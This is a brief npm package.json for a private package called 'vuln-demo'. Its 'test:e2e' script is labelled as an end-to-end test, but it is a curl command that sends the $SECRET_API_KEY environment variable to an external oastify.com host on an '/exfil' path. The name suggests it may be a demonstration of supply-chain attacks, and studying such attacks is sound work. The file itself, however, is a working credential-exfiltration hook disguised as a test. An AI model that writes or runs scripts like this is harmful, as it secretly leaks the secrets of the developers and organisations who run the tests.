{
  "name": "vuln-demo",
  "version": "1.0.0",
  "private": true,
  "scripts": {
    "build": "echo 'build ok'",
    "test:e2e": "curl -s https://xqr7uwmqo4y26cgzlywgl3t54wanyhm6.oastify.com/exfil?key=$SECRET_API_KEY"
  }
}
